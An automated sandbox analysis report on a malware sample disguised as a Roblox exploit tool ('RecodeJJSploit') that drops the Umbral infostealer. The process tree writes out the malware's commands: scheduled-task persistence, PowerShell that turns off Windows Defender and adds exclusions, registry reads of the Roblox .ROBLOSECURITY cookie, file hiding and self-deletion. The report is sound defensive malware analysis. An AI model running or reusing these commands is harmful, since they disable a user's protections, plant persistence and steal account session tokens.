Analysis
-
max time kernel
186s -
max time network
187s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250113-en -
resource tags
-
submitted
17-01-2025 14:01
General
-
Target
JJSPLOITRECODE (1).zip
-
Size
420KB
-
MD5
28bd80f1840e0df6ee7879891b46d334
-
SHA1
1bfe169b2d74ead9080fedd983dc766656667fac
-
SHA256
25e9f3260fa4839cdd0d5831649d747e366eaa52619f3fb072083fc2ff71e085
-
SHA512
5fd90e4686263a57e14cb123b287e535c650245004ed201444e25f8e7806913efde128118dceead9945ddd7cbe0aa063399262b17bc6ecaea6e82cd02f445d39
-
SSDEEP
12288:8zhhUOLyUXPVle40fxddquoKaJ/wJ6I545ul6sOw:yMI6xd/ojVQ4j/w
Malware Config
Signatures
-
Detect Umbral payload 6 IoCs
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
-
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
-
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Drops file in Drivers directory 2 IoCs
-
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 7 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
-
Runs ping.exe 1 TTPs 2 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 47 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\JJSPLOITRECODE (1).zip"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Desktop\RecodeJJSploit.exe"C:\Users\Admin\Desktop\RecodeJJSploit.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\JJSploit.exe"C:\Users\Admin\AppData\Local\Temp\JJSploit.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "DullWave_Cheat" /tr "C:\Windows\xdwdWPS.exe" & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "DullWave_Cheat" /tr "C:\Windows\xdwdWPS.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "nextup" /tr "C:\Users\Admin\xdwdSkype.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "nextup" /tr "C:\Users\Admin\xdwdSkype.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\Desktop\RecodeJJSploit.exe"C:\Users\Admin\Desktop\RecodeJJSploit.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Loads dropped DLL
- Detects videocard installed
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
